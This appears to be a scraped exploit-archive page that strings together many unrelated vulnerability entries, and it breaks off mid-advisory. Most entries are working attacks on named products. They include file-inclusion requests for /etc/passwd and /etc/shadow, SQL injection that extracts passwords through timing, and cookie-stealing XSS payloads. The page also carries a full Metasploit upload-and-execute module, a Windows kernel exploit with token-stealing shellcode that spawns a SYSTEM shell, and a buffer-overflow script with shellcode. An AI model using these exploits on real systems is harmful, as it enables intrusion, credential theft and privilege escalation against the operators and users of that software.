HireHackking

# Exploit Title: StaMPi - Local File Inclusion # Google Dork: "Designed by StaMPi" inurl:fotogalerie.php # Date: 16/2/15 # Author : e . V . E . L # Contact: waleed200955@hotmail.com PoC: http://site.com/path/fotogalerie.php?id=../../../../../../../../../../etc/passwd%00

 u5CMS 3.9.3 (thumb.php) Local File Inclusion Vulnerability Vendor: Stefan P. Minder Product web page: http://www.yuba.ch Affected version: 3.9.3 and 3.9.2 Summary: u5CMS is a little, handy Content Management System for medium-sized websites, conference / congress / submission administration, review processes, personalized serial mails, PayPal payments and online surveys based on PHP and MySQL and Apache. Desc: u5CMS suffers from an authenticated file inclusion vulnerability (LFI) when input passed thru the 'f' parameter to thumb.php script is not properly verified before being used to include files. This can be exploited to include files from local resources with their absolute path and with directory traversal attacks. Tested on: Apache 2.4.10 (Win32) PHP 5.6.3 MySQL 5.6.21 Vulnerabilities discovered by Gjoko 'LiquidWorm' Krstic @zeroscience Advisory ID: ZSL-2015-5224 Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2015-5224.php 29.12.2014 --- GET /u5cms/thumb.php?w=100&f=..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\windows\win.ini HTTP/1.1 GET /u5cms/thumb.php?w=100&f=/windows/win.ini HTTP/1.1

source: https://www.securityfocus.com/bid/49051/info Softbiz Recipes Portal script is prone to multiple cross-site scripting vulnerabilities because it fails to sufficiently sanitize user-supplied data. An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks. http://www.example.com/[path]/admin/index.php?msg=[XSS] http://www.example.com/[path]/signinform.php?id=0&return_add=/caregivers/index.php&errmsg=[XSS] http://www.example.com/[path]/signinform.php?errmsg=[XSS] http://www.example.com/[path]/msg_confirm_mem.php?errmsg=[XSS]

source: https://www.securityfocus.com/bid/49091/info BlueSoft Banner Exchange is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query. Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database. http://www.example.com/signup.php?referer_id=1[SQLi]

source: https://www.securityfocus.com/bid/49064/info Search Network is prone to a cross-site scripting vulnerability because it fails to sufficiently sanitize user-supplied data. An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks. Search Network 2.0 is vulnerable; other versions may also be affected. http://www.example/demo/search.php?action=search_results&query=[XSS Attack]

source: https://www.securityfocus.com/bid/49090/info OpenEMR is prone to multiple cross-site scripting vulnerabilities because it fails to sufficiently sanitize user-supplied data. An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and launch other attacks. OpenEMR 4.0.0 is vulnerable; other versions may also be affected. http://www.example.com/openemr/interface/main/calendar/index.php?tplview='<script>alert('XSS');</script> http://www.example.com/openemr/interface/main/calendar/index.php?pc_category='<script>alert('XSS');</script> http://www.example.com/openemr/interface/main/calendar/index.php?pc_topic='<script>alert('XSS');</script> http://www.example.com/openemr/interface/main/messages/messages.php?sortby="<script>alert('XSS');</script> http://www.example.com/openemr/interface/main/messages/messages.php?sortorder="<script>alert('XSS');</script> http://www.example.com/openemr/interface/main/messages/messages.php?showall=no&sortby=users%2elname&sortorder=asc&begin=724286<">

source: https://www.securityfocus.com/bid/49092/info BlueSoft Rate My Photo Site is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query. Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database. http://www.example.com/index.php?cmd=10&ty=2[SQLi]

source: https://www.securityfocus.com/bid/49103/info The Adobe Flash Media Server is prone to a remote denial-of-service vulnerability. Successful exploits will allow attackers to crash the affected application, denying service to legitimate users. Due to the nature of this issue, arbitrary code execution may be possible; however, this has not been confirmed. http://www.example.com:1111/?%

[CVE-2015-1467] Fork CMS - SQL Injection in Version 3.8.5 ---------------------------------------------------------------- Product Information: Software: Fork CMS Tested Version: 3.8.5, released on Wednesday 14 January 2015 Vulnerability Type: SQL Injection (CWE-89) Download link to tested version: http://www.fork-cms.com/download?release=3.8.5 Description: Fork CMS is dedicated to creating a user friendly environment to build, monitor and update your website. We take great pride in being the Content Management System of choice for beginners and professionals. We combine this grand vision with the latest technological innovations to allow developers, front-end developers and designers to build kick-ass websites. This makes Fork CMS next in line for world domination. (copied from http://www.fork-cms.com/features) ---------------------------------------------------------------- Vulnerability description: When an authenticated user is navigating to "Settings/Translations" and is clicking on the button "Update Filter" the following GET-request is sent to the server: http://127.0.0.1/private/en/locale/index?form=filter&form_token=408d28a8cbab7890c11b20af033c486b&application=&module=&type%5B%5D=act&type%5B%5D=err&type%5B%5D=lbl&type%5B%5D=msg&language%5B%5D=en&name=&value= The parameter language[] is prone to boolean-based blind and stacked queries SQL-Injection. WIth the following payload a delay can be provoked in the request of additional 10 seconds: http://127.0.0.1/private/en/locale/index?form=filter&form_token=68aa8d273e0bd95a70e67372841603d5&application=&module=&type%5B%5D=act%27%2b(select%20*%20from%20(select(sleep(10)))a)%2b%27&type%5B%5D=err&type%5B%5D=lbl&type%5B%5D=msg&language%5B%5D=en&name=&value= Also the parameters type[] are prone to SQL-Injection. ---------------------------------------------------------------- Impact: Direct database access is possible if an attacker is exploiting the SQL Injection vulnerability. ---------------------------------------------------------------- Solution: Update to the latest version, which is 3.8.6, see http://www.fork-cms.com/download. ---------------------------------------------------------------- Timeline: Vulnerability found: 3.2.2015 Vendor informed: 3.2.2015 Response by vendor: 3.2.2015 Fix by vendor 3.2.2015 Public Advisory: 4.2.2015 ---------------------------------------------------------------- Best regards, Sven Schleier

# Exploit Title: Chamilo LMS 1.9.8 Blind SQL Injection # Date: 06-12-2014 # Software Link: http://www.chamilo.org/ # Exploit Author: Kacper Szurek # Contact: http://twitter.com/KacperSzurek # Website: http://security.szurek.pl/ # Category: webapps 1. Description Database::escape_string() function is used to sanitize data but it will work only in two situations: "function_output" or 'function_output'. There is few places where this function is used without quotation marks. http://security.szurek.pl/chamilo-lms-198-blind-sql-injection.html 2. Proof of Concept For this exploit you need teacher privilege (api_is_allowed_to_edit(false, true)) and at least one forum category must exist (get_forum_categories()). <form method="post" action="http://chamilo-url/main/forum/?action=move&content=forum&SubmitForumCategory=1&direction=1&id=0 UNION (SELECT IF(substr(password,1,1) = CHAR(100), SLEEP(5), 0) FROM user WHERE user_id = 1)"> <input type="hidden" name="SubmitForumCategory" value="1"> <input type="submit" value="Hack!"> </form> For second exploit you need administrator privilege (there is no CSRF protection): http://chamilo-url/main/reservation/m_category.php?action=delete&id=0 UNION (SELECT IF(substr(password,1,1) = CHAR(100), SLEEP(5), 0) FROM user WHERE user_id = 1) Those SQL will check if first password character user ID=1 is "d". 3. Solution: Update to version 1.9.10 https://support.chamilo.org/projects/chamilo-18/wiki/Security_issues

source: https://www.securityfocus.com/bid/49117/info eShop plugin for WordPress is prone to multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input. An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may let the attacker steal cookie-based authentication credentials and launch other attacks. eShop 6.2.8 is vulnerable; other versions may also be affected. http://www.example.com/wp-admin/admin.php?page=eshop-templates.php&eshoptemplate=%22%3E%3Cscript%3Ealert%28document.cookie%29;%3C/script%3E http://www.example.com/wp-admin/admin.php?page=eshop-orders.php&view=1&action=%22%3E%3Cscript%3Ealert%28document.cookie%29;%3C/script%3E http://www.example.com/wp-admin/admin.php?page=eshop-orders.php&viewemail=%22%3E%3Cscript%3Ealert%28document.cookie%29;%3C/script%3E

## # This module requires Metasploit: http://www.metasploit.com/download # Current source: https://github.com/rapid7/metasploit-framework ## require 'msf/core' class Metasploit3 < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::FileDropper include Msf::HTTP::Wordpress def initialize(info = {}) super(update_info( info, 'Name' => 'WordPress WP EasyCart Unrestricted File Upload', 'Description' => %q{WordPress Shopping Cart (WP EasyCart) Plugin for WordPress contains a flaw that allows a remote attacker to execute arbitrary PHP code. This flaw exists because the /inc/amfphp/administration/banneruploaderscript.php script does not properly verify or sanitize user-uploaded files. By uploading a .php file, the remote system will place the file in a user-accessible path. Making a direct request to the uploaded file will allow the attacker to execute the script with the privileges of the web server. In versions <= 3.0.8 authentication can be done by using the WordPress credentials of a user with any role. In later versions, a valid EasyCart admin password will be required that is in use by any admin user. A default installation of EasyCart will setup a user called "demouser" with a preset password of "demouser".}, 'License' => MSF_LICENSE, 'Author' => [ 'Kacper Szurek', # Vulnerability disclosure 'Rob Carr <rob[at]rastating.com>' # Metasploit module ], 'References' => [ ['OSVDB', '116806'], ['WPVDB', '7745'] ], 'DisclosureDate' => 'Jan 08 2015', 'Platform' => 'php', 'Arch' => ARCH_PHP, 'Targets' => [['wp-easycart', {}]], 'DefaultTarget' => 0 )) register_options( [ OptString.new('USERNAME', [false, 'The WordPress username to authenticate with (versions <= 3.0.8)']), OptString.new('PASSWORD', [false, 'The WordPress password to authenticate with (versions <= 3.0.8)']), OptString.new('EC_PASSWORD', [false, 'The EasyCart password to authenticate with (versions <= 3.0.18)', 'demouser']), OptBool.new('EC_PASSWORD_IS_HASH', [false, 'Indicates whether or not EC_PASSWORD is an MD5 hash', false]) ], self.class) end def username datastore['USERNAME'] end def password datastore['PASSWORD'] end def ec_password datastore['EC_PASSWORD'] end def ec_password_is_hash datastore['EC_PASSWORD_IS_HASH'] end def use_wordpress_authentication username.to_s != '' && password.to_s != '' end def use_ec_authentication ec_password.to_s != '' end def req_id if ec_password_is_hash return ec_password else return Rex::Text.md5(ec_password) end end def generate_mime_message(payload, date_hash, name, include_req_id) data = Rex::MIME::Message.new data.add_part(date_hash, nil, nil, 'form-data; name="datemd5"') data.add_part(payload.encoded, 'application/x-php', nil, "form-data; name=\"Filedata\"; filename=\"#{name}\"") data.add_part(req_id, nil, nil, 'form-data; name="reqID"') if include_req_id data end def setup if !use_wordpress_authentication && !use_ec_authentication fail_with(Failure::BadConfig, 'You must set either the USERNAME and PASSWORD options or specify an EC_PASSWORD value') end super end def exploit vprint_status("#{peer} - WordPress authentication attack is enabled") if use_wordpress_authentication vprint_status("#{peer} - EC authentication attack is enabled") if use_ec_authentication if use_wordpress_authentication && use_ec_authentication print_status("#{peer} - Both EasyCart and WordPress credentials were supplied, attempting WordPress first...") end if use_wordpress_authentication print_status("#{peer} - Authenticating using #{username}:#{password}...") cookie = wordpress_login(username, password) if !cookie if use_ec_authentication print_warning("#{peer} - Failed to authenticate with WordPress, attempting upload with EC password next...") else fail_with(Failure::NoAccess, 'Failed to authenticate with WordPress') end else print_good("#{peer} - Authenticated with WordPress") end end print_status("#{peer} - Preparing payload...") payload_name = Rex::Text.rand_text_alpha(10) date_hash = Rex::Text.md5(Time.now.to_s) uploaded_filename = "#{payload_name}_#{date_hash}.php" plugin_url = normalize_uri(wordpress_url_plugins, 'wp-easycart') uploader_url = normalize_uri(plugin_url, 'inc', 'amfphp', 'administration', 'banneruploaderscript.php') payload_url = normalize_uri(plugin_url, 'products', 'banners', uploaded_filename) data = generate_mime_message(payload, date_hash, "#{payload_name}.php", use_ec_authentication) print_status("#{peer} - Uploading payload to #{payload_url}") res = send_request_cgi( 'method' => 'POST', 'uri' => uploader_url, 'ctype' => "multipart/form-data; boundary=#{data.bound}", 'data' => data.to_s, 'cookie' => cookie ) fail_with(Failure::Unreachable, 'No response from the target') if res.nil? vprint_error("#{peer} - Server responded with status code #{res.code}") if res.code != 200 print_status("#{peer} - Executing the payload...") register_files_for_cleanup(uploaded_filename) res = send_request_cgi( { 'uri' => payload_url, 'method' => 'GET' }, 5) if !res.nil? && res.code == 404 print_error("#{peer} - Failed to upload the payload") else print_good("#{peer} - Executed payload") end end end

---------------------------------------------------------------------- Title : LG DVR LE6016D - Remote File Disclosure Vulnerability (0day) CVE-ID : none Product : LG Affected : All versions Impact : Critical Remote : Yes Product link: http://www.lgecommercial.com/security-en/products/analog-product/analog-dvr/lg-LE6016D Reported : 10/02/2015 Author : Yakir Wizman, yakir.wizman@gmail.com Vulnerability description: ---------------------------------------------------------------------- No authentication (login) is required to exploit this vulnerability. The LG DVR application is prone to a remote file disclosure vulnerability. An attacker can exploit this vulnerability to retrieve stored files on server such as '/etc/passwd' and '/etc/shadow' by using a simple url request which made by browser. More over, an attacker may be able to compromise encrypted login credentials for or retrieve the device's administrator password allowing them to directly access the device's configuration control panel. Proof of concept: ---------------------------------------------------------------------- The following simple url request will retrieve '/etc/shadow' file: http://127.0.0.1:1234/etc/shadow ~eof.

source: https://www.securityfocus.com/bid/49176/info phpWebSite is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input. An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks. http://www.example.com/mod.php?mod=userpage&page_id=[XSS]

source: https://www.securityfocus.com/bid/49160/info SurgeFTP is prone to multiple cross-site scripting vulnerabilities because it fails to sufficiently sanitize user-supplied data. An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks. SurgeFTP 23b6 is vulnerable; other versions may also be affected. http://www.example.com/cgi/surgeftpmgr.cgi?cmd=log&domainid=0&fname="<script>alert('XSS');</script> http://www.example.com/cgi/surgeftpmgr.cgi?cmd=log&domainid=0&last="<script>alert('XSS');</script> http://www.example.com/cgi/surgeftpmgr.cgi?cmd=class&domainid=0&class_name="<script>alert('XSS');</script> http://www.example.com/cgi/surgeftpmgr.cgi?cmd=report_file&domainid=0&filter="<script>alert('XSS');</script> http://www.example.com/cgi/surgeftpmgr.cgi?cmd=user_admin&domainid="<script>alert('XSS');</script> http://www.example.com/cgi/surgeftpmgr.cgi?cmd=class&domainid=0&classid="<script>alert('XSS');</script>

source: https://www.securityfocus.com/bid/49138/info PHP Flat File Guestbook is prone to a remote file-include vulnerability because it fails to sufficiently sanitize user-supplied input. Exploiting this issue may allow an attacker to compromise the application and the underlying system; other attacks are also possible. http://www.example.com/[path]/ffgb_admin.php?book_id=http://shell?

source: https://www.securityfocus.com/bid/49188/info PHPList is prone to a security-bypass vulnerability and an information-disclosure vulnerability. An attacker can exploit these issues to gain access to sensitive information and send arbitrary messages to registered users. Other attacks are also possible. http://www.example.com/lists/?p=forward&uid=VALID_UID&mid=ID http://www.example.com/lists/?p=forward&uid=foo&mid=ID

source: https://www.securityfocus.com/bid/49187/info awiki is prone to multiple local file-include vulnerabilities because it fails to properly sanitize user-supplied input. An attacker can exploit this vulnerability to obtain potentially sensitive information and execute arbitrary local scripts in the context of the webserver process. This may allow the attacker to compromise the application and the computer; other attacks are also possible. awiki 20100125 is vulnerable; other versions may also be affected. http://www.example.com/awiki/index.php?page=/etc/passwd http://www.example.com/awiki/index.php?action=Editar+el+Motor&scriptname=/etc/passwd

source: https://www.securityfocus.com/bid/49193/info The Fast Secure Contact Form plugin for WordPress is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input. An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks. Versions prior to Fast Secure Contact Form 3.0.3.2 are vulnerable. http://www.example.com/wp-content/plugins/si-contact-form/captcha/test/index.php/%22%3E%3Cscript%3Ealert%28document.coo kie%29;%3C/script%3E

source: https://www.securityfocus.com/bid/49197/info WP-Stats-Dashboard is prone to multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input. An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may let the attacker steal cookie-based authentication credentials and launch other attacks. WP-Stats-Dashboard 2.6.5.1 is vulnerable; other versions may also be affected. http://www.example.com/wp-content/plugins/wp-stats-dashboard/view/admin/admin_profile_type.php?icon=%22%3E%3Cscript%3Ealert%28document.cookie%29;%3C/script%3E http://www.example.com/wp-content/plugins/wp-stats-dashboard/view/admin/admin_profile_type.php?url=%22%3E%3Cscript%3Ealert%28document.cookie%29;%3C/script%3E http://www.example.com/wp-content/plugins/wp-stats-dashboard/view/admin/admin_profile_type.php?name=%22%3E%3Cscript%3Ealert%28document.cookie%29;%3C/script%3E http://www.example.com/wp-content/plugins/wp-stats-dashboard/view/admin/admin_profile_type.php?type=%22%3E%3Cscript%3Ealert%28document.cookie%29;%3C/script%3E http://www.example.com/wp-content/plugins/wp-stats-dashboard/view/admin/admin_profile_type.php?code=%22%3E%3Cscript%3Ealert%28document.cookie%29;%3C/script%3E http://www.example.com/wp-content/plugins/wp-stats-dashboard/view/admin/admin_profile_type.php?code=200&username=%22%3E%3Cscript%3Ealert%28document.cookie%29;%3C/script%3E http://www.example.com/wp-content/plugins/wp-stats-dashboard/view/admin/blocks/select-trend.php?onchange=%3E%3Cscript%3Ealert%28document.cookie%29;%3C/script%3E http://www.example.com/wp-content/plugins/wp-stats-dashboard/view/admin/blocks/submenu.php?submenu[%22%3E%3Cscript%3Ealert%28document.cookie%29;%3C/script%3E]

source: https://www.securityfocus.com/bid/49192/info StudioLine Photo Basic ActiveX is prone to an arbitrary-file-overwrite vulnerability. Attackers can overwrite arbitrary files on the victim's computer in the context of the vulnerable application using the ActiveX control (typically Internet Explorer). StudioLine Photo Basic 3.70.34.0 is vulnerable; other versions may also be affected. <html> <object classid='clsid:C2FBBB5F-6FF7-4F6B-93A3-7EDB509AA938' id='target' /></object> <input language=VBScript onclick=Boom() type=button value="Exploit"> <script language = 'vbscript'> Sub Boom() arg1="FilePath\File_name_to_corrupt_or_create" arg2=True target.EnableLog arg1 ,arg2 End Sub </script> </html>

/* Exploit Title - SoftSphere DefenseWall FW/IPS Arbitrary Write Privilege Escalation Date - 10th February 2015 Discovered by - Parvez Anwar (@parvezghh) Vendor Homepage - http://www.softsphere.com Tested Version - 3.24 Driver Version - 3.2.3.0 - dwall.sys Tested on OS - 32bit Windows XP SP3 OSVDB - http://www.osvdb.org/show/osvdb/117996 CVE ID - CVE-2015-1515 Vendor fix url - Fixed Version - no fix Fixed driver ver - */ #include <stdio.h> #include <windows.h> #define BUFSIZE 4096 typedef struct _SYSTEM_MODULE_INFORMATION_ENTRY { HANDLE Section; PVOID MappedBase; PVOID Base; ULONG Size; ULONG Flags; USHORT Index; USHORT NameLength; USHORT LoadCount; USHORT PathLength; CHAR ImageName[256]; } SYSTEM_MODULE_INFORMATION_ENTRY, *PSYSTEM_MODULE_INFORMATION_ENTRY; typedef struct _SYSTEM_MODULE_INFORMATION { ULONG Count; SYSTEM_MODULE_INFORMATION_ENTRY Module[1]; } SYSTEM_MODULE_INFORMATION, *PSYSTEM_MODULE_INFORMATION; typedef enum _SYSTEM_INFORMATION_CLASS { SystemModuleInformation = 11, SystemHandleInformation = 16 } SYSTEM_INFORMATION_CLASS; typedef NTSTATUS (WINAPI *_NtQuerySystemInformation)( SYSTEM_INFORMATION_CLASS SystemInformationClass, PVOID SystemInformation, ULONG SystemInformationLength, PULONG ReturnLength); typedef NTSTATUS (WINAPI *_NtQueryIntervalProfile)( DWORD ProfileSource, PULONG Interval); typedef void (*FUNCTPTR)(); // Windows XP SP3 #define XP_KPROCESS 0x44 // Offset to _KPROCESS from a _ETHREAD struct #define XP_TOKEN 0xc8 // Offset to TOKEN from the _EPROCESS struct #define XP_UPID 0x84 // Offset to UniqueProcessId FROM the _EPROCESS struct #define XP_APLINKS 0x88 // Offset to ActiveProcessLinks _EPROCESS struct BYTE token_steal_xp[] = { 0x52, // push edx Save edx on the stack 0x53, // push ebx Save ebx on the stack 0x33,0xc0, // xor eax, eax eax = 0 0x64,0x8b,0x80,0x24,0x01,0x00,0x00, // mov eax, fs:[eax+124h] Retrieve ETHREAD 0x8b,0x40,XP_KPROCESS, // mov eax, [eax+XP_KPROCESS] Retrieve _KPROCESS 0x8b,0xc8, // mov ecx, eax 0x8b,0x98,XP_TOKEN,0x00,0x00,0x00, // mov ebx, [eax+XP_TOKEN] Retrieves TOKEN 0x8b,0x80,XP_APLINKS,0x00,0x00,0x00, // mov eax, [eax+XP_APLINKS] <-| Retrieve FLINK from ActiveProcessLinks 0x81,0xe8,XP_APLINKS,0x00,0x00,0x00, // sub eax, XP_APLINKS | Retrieve _EPROCESS Pointer from the ActiveProcessLinks 0x81,0xb8,XP_UPID,0x00,0x00,0x00,0x04,0x00,0x00,0x00, // cmp [eax+XP_UPID], 4 | Compares UniqueProcessId with 4 (System Process) 0x75,0xe8, // jne ---- 0x8b,0x90,XP_TOKEN,0x00,0x00,0x00, // mov edx, [eax+XP_TOKEN] Retrieves TOKEN and stores on EDX 0x8b,0xc1, // mov eax, ecx Retrieves KPROCESS stored on ECX 0x89,0x90,XP_TOKEN,0x00,0x00,0x00, // mov [eax+XP_TOKEN], edx Overwrites the TOKEN for the current KPROCESS 0x5b, // pop ebx Restores ebx 0x5a, // pop edx Restores edx 0xc2,0x08 // ret 8 Away from the kernel }; DWORD HalDispatchTableAddress() { _NtQuerySystemInformation NtQuerySystemInformation; PSYSTEM_MODULE_INFORMATION pModuleInfo; DWORD HalDispatchTable; CHAR kFullName[256]; PVOID kBase = NULL; LPSTR kName; HMODULE Kernel; FUNCTPTR Hal; ULONG len; NTSTATUS status; NtQuerySystemInformation = (_NtQuerySystemInformation)GetProcAddress(GetModuleHandle("ntdll.dll"), "NtQuerySystemInformation"); if (!NtQuerySystemInformation) { printf("[-] Unable to resolve NtQuerySystemInformation\n\n"); return -1; } status = NtQuerySystemInformation(SystemModuleInformation, NULL, 0, &len); if (!status) { printf("[-] An error occured while reading NtQuerySystemInformation. Status = 0x%08x\n\n", status); return -1; } pModuleInfo = (PSYSTEM_MODULE_INFORMATION)GlobalAlloc(GMEM_ZEROINIT, len); if(pModuleInfo == NULL) { printf("[-] An error occurred with GlobalAlloc for pModuleInfo\n\n"); return -1; } status = NtQuerySystemInformation(SystemModuleInformation, pModuleInfo, len, &len); memset(kFullName, 0x00, sizeof(kFullName)); strcpy_s(kFullName, sizeof(kFullName)-1, pModuleInfo->Module[0].ImageName); kBase = pModuleInfo->Module[0].Base; printf("[i] Kernel base name %s\n", kFullName); kName = strrchr(kFullName, '\\'); Kernel = LoadLibraryA(++kName); if(Kernel == NULL) { printf("[-] Failed to load kernel base\n\n"); return -1; } Hal = (FUNCTPTR)GetProcAddress(Kernel, "HalDispatchTable"); if(Hal == NULL) { printf("[-] Failed to find HalDispatchTable\n\n"); return -1; } printf("[i] HalDispatchTable address 0x%08x\n", Hal); printf("[i] Kernel handle 0x%08x\n", Kernel); printf("[i] Kernel base address 0x%08x\n", kBase); HalDispatchTable = ((DWORD)Hal - (DWORD)Kernel + (DWORD)kBase); printf("[+] Kernel address of HalDispatchTable 0x%08x\n", HalDispatchTable); if(!HalDispatchTable) { printf("[-] Failed to calculate HalDispatchTable\n\n"); return -1; } return HalDispatchTable; } int GetWindowsVersion() { int v = 0; DWORD version = 0, minVersion = 0, majVersion = 0; version = GetVersion(); minVersion = (DWORD)(HIBYTE(LOWORD(version))); majVersion = (DWORD)(LOBYTE(LOWORD(version))); if (minVersion == 1 && majVersion == 5) v = 1; // "Windows XP; if (minVersion == 1 && majVersion == 6) v = 2; // "Windows 7"; if (minVersion == 2 && majVersion == 5) v = 3; // "Windows Server 2003; return v; } void spawnShell() { STARTUPINFOA si; PROCESS_INFORMATION pi; ZeroMemory(&pi, sizeof(pi)); ZeroMemory(&si, sizeof(si)); si.cb = sizeof(si); si.cb = sizeof(si); si.dwFlags = STARTF_USESHOWWINDOW; si.wShowWindow = SW_SHOWNORMAL; if (!CreateProcess(NULL, "cmd.exe", NULL, NULL, TRUE, CREATE_NEW_CONSOLE, NULL, NULL, &si, &pi)) { printf("\n[-] CreateProcess failed (%d)\n\n", GetLastError()); return; } CloseHandle(pi.hThread); CloseHandle(pi.hProcess); } int main(int argc, char *argv[]) { _NtQueryIntervalProfile NtQueryIntervalProfile; LPVOID input[1] = {0}; LPVOID addrtoshell; HANDLE hDevice; DWORD dwRetBytes = 0; DWORD HalDispatchTableTarget; ULONG time = 0; unsigned char devhandle[MAX_PATH]; printf("-------------------------------------------------------------------------------\n"); printf(" SoftSphere DefenseWall FW/HIPS (dwall.sys) Arbitrary Write EoP Exploit \n"); printf(" Tested on Windows XP SP3 (32bit) \n"); printf("-------------------------------------------------------------------------------\n\n"); if (GetWindowsVersion() == 1) { printf("[i] Running Windows XP\n"); } if (GetWindowsVersion() == 0) { printf("[i] Exploit not supported on this OS\n\n"); return -1; } sprintf(devhandle, "\\\\.\\%s", "dwall"); NtQueryIntervalProfile = (_NtQueryIntervalProfile)GetProcAddress(GetModuleHandle("ntdll.dll"), "NtQueryIntervalProfile"); if (!NtQueryIntervalProfile) { printf("[-] Unable to resolve NtQueryIntervalProfile\n\n"); return -1; } addrtoshell = VirtualAlloc(NULL, BUFSIZE, MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE); if(addrtoshell == NULL) { printf("[-] VirtualAlloc allocation failure %.8x\n\n", GetLastError()); return -1; } printf("[+] VirtualAlloc allocated memory at 0x%.8x\n", addrtoshell); memset(addrtoshell, 0x90, BUFSIZE); memcpy(addrtoshell, token_steal_xp, sizeof(token_steal_xp)); printf("[i] Size of shellcode %d bytes\n", sizeof(token_steal_xp)); hDevice = CreateFile(devhandle, GENERIC_READ | GENERIC_WRITE, FILE_SHARE_READ | FILE_SHARE_WRITE, NULL, OPEN_EXISTING , 0, NULL); if (hDevice == INVALID_HANDLE_VALUE) { printf("[-] CreateFile open %s device failed (%d)\n\n", devhandle, GetLastError()); return -1; } else { printf("[+] Open %s device successful\n", devhandle); } HalDispatchTableTarget = HalDispatchTableAddress() + sizeof(DWORD); printf("[+] HalDispatchTable+4 (0x%08x) will be overwritten\n", HalDispatchTableTarget); input[0] = addrtoshell; // input buffer contents gets written to our output buffer address printf("[+] Input buffer contents %08x\n", input[0]); printf("[~] Press any key to send Exploit . . .\n"); getch(); DeviceIoControl(hDevice, 0x00222000, input, sizeof(input), (LPVOID)HalDispatchTableTarget, 0, &dwRetBytes, NULL); printf("[+] Buffer sent\n"); CloseHandle(hDevice); printf("[+] Spawning SYSTEM Shell\n"); NtQueryIntervalProfile(2, &time); spawnShell(); return 0; }

#!/usr/bin/env python ################################################################# # Exploit Title: MooPlayer 1.3.0 'm3u' SEH Buffer Overflow # # Date Discovered: 10-02-2015 # # Author: dogo h@ck # # Vulnerable Software: Moo player 1.3.0 # # Software Link: https://mooplayer.jaleco.com/ # # Version: 1.3.0 # # Tested On: Windows XP SP3 # ################################################################# #BadCharacters = ("\x00\x0a\x0d") # ################################################################# head="http://" buffer=10000 junk = "\x41" * 264 nseh = "\xeb\x06\x90\x90" seh = "\xe2\x69\xc8\x74" #74C869E2 OLEACC.dll || Path=C:\WINDOWS\system32\OLEACC.dll # Windows XP SP3 English MessageBoxA Shellcode shellcode = ("\x31\xc0\x31\xdb\x31\xc9\x31\xd2" "\x51\x68\x6c\x6c\x20\x20\x68\x33" "\x32\x2e\x64\x68\x75\x73\x65\x72" "\x89\xe1\xbb\x7b\x1d\x80\x7c\x51" # 0x7c801d7b ; LoadLibraryA(user32.dll) "\xff\xd3\xb9\x5e\x67\x30\xef\x81" "\xc1\x11\x11\x11\x11\x51\x68\x61" "\x67\x65\x42\x68\x4d\x65\x73\x73" "\x89\xe1\x51\x50\xbb\x40\xae\x80" # 0x7c80ae40 ; GetProcAddress(user32.dll, MessageBoxA) "\x7c\xff\xd3\x89\xe1\x31\xd2\x52" "\x51\x51\x52\xff\xd0\x31\xc0\x50" "\xb8\x12\xcb\x81\x7c\xff\xd0") poc = head + junk + nseh + seh + shellcode junk1 = "\x44"*(buffer-len(poc)) poc += junk1 file = "payload.m3u" f=open(file,"w") f.write(head + poc); f.close();

Advisory: Cross-Site Scripting in IBM Endpoint Manager Relay Diagnostics Page During a penetration test, RedTeam Pentesting discovered that the IBM Endpoint Manager Relay Diagnostics page allows anybody to persistently store HTML and JavaScript code that is executed when the page is opened in a browser. Details ======= Product: IBM Endpoint Manager Affected Versions: 9.1.x versions earlier than 9.1.1229, 9.2.x versions earlier than 9.2.1.48 Fixed Versions: 9.1.1229, 9.2.1.48 Vulnerability Type: Cross-Site Scripting Security Risk: medium Vendor URL: http://www-03.ibm.com/software/products/en/endpoint-manager-family Vendor Status: fixed version released Advisory URL: https://www.redteam-pentesting.de/advisories/rt-sa-2014-013 Advisory Status: published CVE: CVE-2014-6137 CVE URL: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-6137 Introduction ============ IBM Endpoint Manager products - built on IBM BigFix technology - can help you achieve smarter, faster endpoint management and security. These products enable you to see and manage physical and virtual endpoints including servers, desktops, notebooks, smartphones, tablets and specialized equipment such as point-of-sale devices, ATMs and self-service kiosks. Now you can rapidly remediate, protect and report on endpoints in near real time. (from the vendor's homepage) More Details ============ Systems that run IBM Endpoint Manager (IEM, formerly Tivoli Endpoint Manager, or TEM) components, such as TEM Root Servers or TEM Relays, typically serve HTTP and HTTPS on port 52311. There, the server or relay diagnostics page is normally accessible at the path /rd. That page can be accessed without authentication and lets users query and modify different information. For example, a TEM Relay can be instructed to gather a specific version of a certain Fixlet site by requesting a URL such as the following: http://tem-relay.example.com:52311/cgi-bin/bfenterprise/ BESGatherMirrorNew.exe/-gatherversion ?Body=GatherSpecifiedVersion &url=http://tem-root.example.com:52311/cgi-bin/bfgather.exe/actionsite &version=1 &useCRC=0 The URL parameter url is susceptible to cross-site scripting. When the following URL is requested, the browser executes the JavaScript code provided in the parameter: 